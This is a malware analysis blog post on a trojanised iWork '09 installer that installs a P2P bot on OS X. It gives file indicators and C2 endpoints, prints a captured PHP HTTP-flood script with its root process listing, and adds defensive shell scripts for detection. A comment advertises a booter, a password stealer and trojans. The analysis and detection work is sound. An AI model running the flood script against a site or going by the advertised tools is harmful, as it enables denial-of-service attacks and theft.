
Update: “iWorkServices” Not Just A Trojan

Let’s call the trojanised iWork package Krowi.

So, the story starts when an OS X user downloads an iWork ’09 installation package, bundled with a serial key, through BitTorrent.


Take note that Krowi is often found in a package named “iWork09.zip” with a file size of 450.4 MB. Upon extracting it you will find NO “iWorkServices” here; instead there is a main installation package named iWork09Trial.mpkg and an enticing serial.txt.

Upon inspecting the contents of “iWork09Trial.mpkg” you will find the nasty Krowi package “iWorkServices.pkg” piggybacking inside.


The file “preflight” contains a one-line instruction that executes the Mach-O binary “iworkservices”. Because the package writes into /System and /usr/bin, the Installer prompts for an administrator password, so the preflight script, and with it the binary it launches, runs with root privileges before the real iWork payload is even installed.

When installed, this creates the following files:

/System/Library/StartupItems/iWorkServices/StartupParameters.plist

/System/Library/StartupItems/iWorkServices/iWorkServices

/usr/bin/iWorkServices

Since the system keeps a copy of the installer receipt, you will find this as well:

/Library/Receipts/iWorkServices.pkg

Once installed, you will find the “iWorkServices” process running in the background, persistently attempting to report to its command-and-control channels:

69.92.177.146:59201

qwfojzlk.freehostia.com:1024
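The following is an added example, not code from the original post: a read-only sweep for the on-disk and network indicators listed above. The four dropped paths and the two C2 endpoints are the page’s; the function names, the optional ROOT argument (so a mounted image or copied volume can be checked offline) and the demo data are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original post): IOC sweep for the iWorkServices
# dropper. Paths and C2 endpoints are from the page; everything else is assumed.

# Files the installer drops, relative to the volume root.
IWS_PATHS='
/System/Library/StartupItems/iWorkServices/StartupParameters.plist
/System/Library/StartupItems/iWorkServices/iWorkServices
/usr/bin/iWorkServices
/Library/Receipts/iWorkServices.pkg
'

# iws_scan ROOT: print every indicator present under ROOT (default "/").
iws_scan() {
    root="${1:-/}"; root="${root%/}"
    for p in $IWS_PATHS; do
        if [ -e "$root$p" ]; then
            printf '%s\n' "$root$p"
        fi
    done
    return 0
}

# iws_count ROOT: number of indicators found; 0 means no on-disk trace.
iws_count() {
    iws_scan "$1" | wc -l | tr -d ' '
}

# Known C2 endpoints from the post ("host:port").
IWS_C2='69.92.177.146:59201
qwfojzlk.freehostia.com:1024'

# iws_c2_hits: read `netstat -an` / `lsof -i` style lines on stdin and print
# those that reference a known C2 endpoint. Both "host:port" and the "host.port"
# form that macOS netstat prints are matched; dots in the host are escaped.
iws_c2_hits() {
    pat=''
    for ep in $IWS_C2; do
        host=$(printf '%s' "${ep%:*}" | sed 's/\./\\./g')
        port="${ep##*:}"
        pat="$pat${pat:+|}$host[:.]$port"
    done
    grep -E "$pat"
}

# Constructed demo (no real infection): stage the dropped files under a
# temporary root and feed two fabricated netstat lines, then print
# "<files found> <c2 connections found>".
iws_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/System/Library/StartupItems/iWorkServices" "$d/usr/bin" \
             "$d/Library/Receipts/iWorkServices.pkg"
    : > "$d/System/Library/StartupItems/iWorkServices/StartupParameters.plist"
    : > "$d/System/Library/StartupItems/iWorkServices/iWorkServices"
    : > "$d/usr/bin/iWorkServices"
    files=$(iws_count "$d")
    rm -rf "$d"
    net=$(printf '%s\n' \
        'tcp4  0  0  192.168.1.5.49231   69.92.177.146.59201   ESTABLISHED' \
        'tcp4  0  0  192.168.1.5.49232   17.172.224.47.443     ESTABLISHED' \
        | iws_c2_hits | wc -l | tr -d ' ')
    echo "$files $net"
}
```

On a live machine, `iws_scan /` lists whatever survived of the dropper and `netstat -an | iws_c2_hits` shows whether the bot is currently talking to either known channel; a clean host gives no output from both. The receipt under /Library/Receipts is worth keeping as evidence before removing anything.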


Krowi is a nasty P2P-controlled bot similar to the well-known Storm Worm.

An infected OS X machine can be controlled remotely by the bot master. It can be used to participate in a massive Distributed Denial of Service (DDoS) attack, to install further applications (such as Pay-per-Install software), to send spam, to distribute malware, and possibly to gather user data.

Looking further, this malware comes with a Lua interpreter, described by its authors as a “powerful, fast, light-weight, embeddable scripting language”. This expands considerably what the attacker can do on the affected machine: an automated master could respond and push PHP script …

Imagine: load and run!

++++++++++++++++

Update 24th Jan: I just want to link a few infection reports I found around the net from users who were able to capture the PHP scripts running on their boxes:

http://notahat.com/posts/28 

http://macmagazine.com.br/forum/index.php?showtopic=12056&pid=58190&st=0&#entry58190 

The captured command line, cleaned up (the original capture is garbled by OCR). Each pass opens 100 parallel HTTP requests to the target, waits for all of them to complete, and starts again without pause: a plain HTTP flood, run as root.

php while (1) {
    $mh = curl_multi_init();
    $ch = array();
    for ($i = 0; $i < 100; $i++) {
        $ch[$i] = curl_init();
        curl_setopt($ch[$i], CURLOPT_URL, "http://www.dollarcardmarketing.com");
        curl_setopt($ch[$i], CURLOPT_HEADER, 0);
        curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true);
        curl_multi_add_handle($mh, $ch[$i]);
    }
    do {
        curl_multi_exec($mh, $running);
    } while ($running > 0);
    for ($i = 0; $i < 100; $i++) {
        curl_multi_remove_handle($mh, $ch[$i]);
    }
    curl_multi_close($mh);
}

Process listing from the same report, five copies of the script running in parallel as root:

root 35113 32.4 0.2 88956 4952? R-r 10:02 1:54.60 php while (1) { $mh = curl_multi_init(); $ch = array(); for ($i = 0; $i < 100; $i++) { $ch[$i] = curl_init(); curl_setopt($ch[$i], CURLOPT_URL, "http://www.dollarcardmarketing.com"); curl_setopt($ch[$i], CURLOPT_HEADER, 0); curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true); curl_multi_add_handle($mh, $ch[$i]); } do { curl_multi_exec($mh, $running); } while ($running > 0); for ($i = 0; $i < 100; $i++) { curl_multi_remove_handle($mh, $ch[$i]); } curl_multi_close($mh); }

root 35112 31.8 0.2 88956 4936? R-r 10:02 1:54.67 php while (1) { $mh = curl_multi_init(); $ch = array(); for ($i = 0; $i < 100; $i++) { $ch[$i] = curl_init(); curl_setopt($ch[$i], CURLOPT_URL, "http://www.dollarcardmarketing.com"); curl_setopt($ch[$i], CURLOPT_HEADER, 0); curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true); curl_multi_add_handle($mh, $ch[$i]); } do { curl_multi_exec($mh, $running); } while ($running > 0); for ($i = 0; $i < 100; $i++) { curl_multi_remove_handle($mh, $ch[$i]); } curl_multi_close($mh); }

root 35064 31.2 0.2 88956 5048? R-r 10:00 4:00.37 php while (1) { $mh = curl_multi_init(); $ch = array(); for ($i = 0; $i < 100; $i++) { $ch[$i] = curl_init(); curl_setopt($ch[$i], CURLOPT_URL, "http://www.dollarcardmarketing.com"); curl_setopt($ch[$i], CURLOPT_HEADER, 0); curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true); curl_multi_add_handle($mh, $ch[$i]); } do { curl_multi_exec($mh, $running); } while ($running > 0); for ($i = 0; $i < 100; $i++) { curl_multi_remove_handle($mh, $ch[$i]); } curl_multi_close($mh); }

root 35111 31.2 0.2 88956 4944? R-r 10:02 1:55.37 php while (1) { $mh = curl_multi_init(); $ch = array(); for ($i = 0; $i < 100; $i++) { $ch[$i] = curl_init(); curl_setopt($ch[$i], CURLOPT_URL, "http://www.dollarcardmarketing.com"); curl_setopt($ch[$i], CURLOPT_HEADER, 0); curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true); curl_multi_add_handle($mh, $ch[$i]); } do { curl_multi_exec($mh, $running); } while ($running > 0); for ($i = 0; $i < 100; $i++) { curl_multi_remove_handle($mh, $ch[$i]); } curl_multi_close($mh); }

root 35100 31.1 0.2 88956 4952? R-r 10:02 2:00.98 php while (1) { $mh = curl_multi_init(); $ch = array(); for ($i = 0; $i < 100; $i++) { $ch[$i] = curl_init(); curl_setopt($ch[$i], CURLOPT_URL, "http://www.dollarcardmarketing.com"); curl_setopt($ch[$i], CURLOPT_HEADER, 0); curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true); curl_multi_add_handle($mh, $ch[$i]); } do { curl_multi_exec($mh, $running); } while ($running > 0); for ($i = 0; $i < 100; $i++) { curl_multi_remove_handle($mh, $ch[$i]); } curl_multi_close($mh); }
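As an added example, not from the original post or the linked reports, here is the triage a responder would run over a process listing like the one above: pick out root-owned processes whose command line is an inline php script using the curl_multi_* API (or that name iWorkServices), and pull the flood target out of the CURLOPT_URL argument so the victim can be identified. The function names are my own; the sample listing is constructed after the page’s, with the command lines shortened and two benign processes added, and assumes the `ps aux` column order (USER PID ... COMMAND).

```shell
#!/bin/sh
# Added example (not from the original post): triage of a ps listing for the
# root-owned php flood processes shown above. Assumes `ps aux` column order
# (USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND).

# iws_suspicious_pids: read ps lines on stdin, print the PID of every process
# that runs as root and either is an inline php script built on curl_multi_*
# or refers to iWorkServices.
iws_suspicious_pids() {
    awk '$1 == "root" && ($0 ~ /php .*curl_multi_init/ || $0 ~ /iWorkServices/) { print $2 }'
}

# iws_flood_targets: extract the CURLOPT_URL values from the captured command
# lines (one per distinct target), i.e. who is being flooded.
iws_flood_targets() {
    grep -o 'CURLOPT_URL, *"[^"]*"' | sed 's/.*"\([^"]*\)"/\1/' | sort -u
}

# Constructed sample listing, modelled on the page's capture (command lines
# shortened with "..."; "alice" and launchd lines added as benign controls).
IWS_SAMPLE_PS='USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 35113 32.4 0.2 88956 4952 ?? R 10:02 1:54.60 php while (1) { $mh = curl_multi_init(); ... curl_setopt($ch[$i], CURLOPT_URL, "http://www.dollarcardmarketing.com"); ... curl_multi_close($mh); }
root 35112 31.8 0.2 88956 4936 ?? R 10:02 1:54.67 php while (1) { $mh = curl_multi_init(); ... curl_setopt($ch[$i], CURLOPT_URL, "http://www.dollarcardmarketing.com"); ... curl_multi_close($mh); }
root 35064 31.2 0.2 88956 5048 ?? R 10:00 4:00.37 php while (1) { $mh = curl_multi_init(); ... curl_setopt($ch[$i], CURLOPT_URL, "http://www.dollarcardmarketing.com"); ... curl_multi_close($mh); }
alice 4021 0.3 0.5 120000 9000 ?? S 09:58 0:02.10 php -S localhost:8000
root 88 0.0 0.1 30000 2000 ?? Ss 09:00 0:00.50 /usr/bin/iWorkServices
root 1 0.0 0.1 20000 1000 ?? Ss 09:00 0:01.00 /sbin/launchd'

# iws_demo_pids: PIDs flagged in the sample, space-separated.
iws_demo_pids() {
    printf '%s\n' "$IWS_SAMPLE_PS" | iws_suspicious_pids | tr '\n' ' ' | sed 's/ $//'
}

# iws_demo_targets: flood targets found in the sample.
iws_demo_targets() {
    printf '%s\n' "$IWS_SAMPLE_PS" | iws_flood_targets
}
```

On a live host the same functions take `ps aux | iws_suspicious_pids` and `ps aux | iws_flood_targets`; the PID list is what you would hand to `kill` once the StartupItem and /usr/bin/iWorkServices have been removed, otherwise the bot simply respawns the flood on the next command. Matching on `curl_multi_init` rather than on the victim’s hostname keeps the rule useful when the master changes target.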

  1. January 24, 2009 at 4:22 pm

    “… It can be used to participate in a massive Distributed Denial of Service attack(DDoS) ,…”

    That’s exactly what it did and it was quite a malicious attack indeed. We now know how… What we DON’T know is who or why?

    Here’s some further info from The Washington Post:

    http://voices.washingtonpost.com/securityfix/2009/01/pirated_iwork_software_infects.html

    Best Regards,

    John
    http://www.DollarCardMarketing.com

  2. May 16, 2009 at 2:44 am

    here you can download best booter, yahoo password stealer and undetectable trojans:

    satan-hacking.blogspot.com

    • Methusela Cebrian Ferrer
      May 16, 2009 at 11:26 am

      Thanks! let me know if you’ll find / create one in mac. (“,

